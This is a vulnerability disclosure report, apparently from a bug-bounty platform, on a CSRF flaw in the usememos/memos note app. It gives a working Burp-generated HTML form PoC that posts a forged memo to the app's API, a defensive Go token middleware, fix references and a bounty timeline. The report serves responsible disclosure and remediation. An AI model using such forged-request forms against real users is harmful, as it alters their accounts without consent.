Add any thoughts via CSRF in usememos/memos

Valid

Reported on

Dec 28th 2022


Description

An attacker can add arbitrary thoughts to a user's account via a CSRF attack.

When the attacker sends a link to the victim and the victim clicks on it, the thoughts are added.

Proof of Concept

1- The attacker adds a thought and intercepts the request.

2- Use this request to generate a CSRF PoC.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.usememos.com/api/memo" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;content&quot;&#58;&quot;Test&#32;CSRF&quot;&#44;&quot;visibility&quot;&#58;&quot;PRIVATE&quot;&#44;&quot;resourceIdList&quot;&#58;&#91;&#93;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

POC

https://drive.google.com/file/d/11Hec1H-61UpoOLVi55uWRpLBUMLVjRbi/view?usp=share_link

Some sources on fixing CSRF

Add a CSRF token

https://www.freecodecamp.org/news/csrf-protection-problem-and-how-to-fix-it

https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
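
One way to apply the token recommendation on the server, as an added example (not code from this report or from the memos project's fix): a Go net/http middleware that refuses the `text/plain` body the PoC form sends and requires a session-bound HMAC token in a request header. The `session` cookie name, the `X-CSRF-Token` header, the key and the `Replay` helper are assumptions made for illustration.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
	"strings"
)
var csrfKey = []byte("constructed-example-key") // constructed; load a real key from secret storage
// TokenFor derives the CSRF token bound to one session ID (HMAC-based token pattern).
func TokenFor(sessionID string) string {
	m := hmac.New(sha256.New, csrfKey)
	m.Write([]byte(sessionID))
	return fmt.Sprintf("%x", m.Sum(nil))
}
// CSRFGuard rejects POSTs that a cross-site HTML form could have produced.
func CSRFGuard(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodPost { // extend to PUT/PATCH/DELETE in a real API
			// Forms can only send urlencoded, multipart or text/plain bodies.
			mt, _, err := mime.ParseMediaType(r.Header.Get("Content-Type"))
			if err != nil || mt != "application/json" {
				http.Error(w, "unsupported content type", http.StatusUnsupportedMediaType)
				return
			}
			// A form cannot set this header, and another origin cannot read the token.
			c, err := r.Cookie("session") // hypothetical cookie name
			if err != nil || !hmac.Equal([]byte(r.Header.Get("X-CSRF-Token")), []byte(TokenFor(c.Value))) {
				http.Error(w, "bad CSRF token", http.StatusForbidden)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}
// Replay sends one constructed POST /api/memo through the guard and returns the status code.
func Replay(contentType, token string) int {
	req := httptest.NewRequest(http.MethodPost, "/api/memo", strings.NewReader(`{"content":"Test CSRF"}`))
	req.Header.Set("Content-Type", contentType)
	req.Header.Set("X-CSRF-Token", token)
	req.AddCookie(&http.Cookie{Name: "session", Value: "sess-1"}) // constructed session ID
	rec := httptest.NewRecorder()
	CSRFGuard(http.HandlerFunc(func(http.ResponseWriter, *http.Request) {})).ServeHTTP(rec, req)
	return rec.Code
}
func main() { fmt.Println(Replay("text/plain", ""), Replay("application/json", ""), Replay("application/json", TokenFor("sess-1"))) }
```

The first replay has the shape of the PoC form's request (cookie attached, `text/plain` body, no token) and is refused before the handler runs; only the request carrying the token for its own session reaches it.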

Impact

An attacker can add arbitrary thoughts to a user's account via a CSRF attack.

We are processing your report and will contact the usememos/memos team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
STEVEN validated this vulnerability a year ago
samirwaleed has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b a year ago
STEVEN has been awarded the fix bounty
This vulnerability has now been published a year ago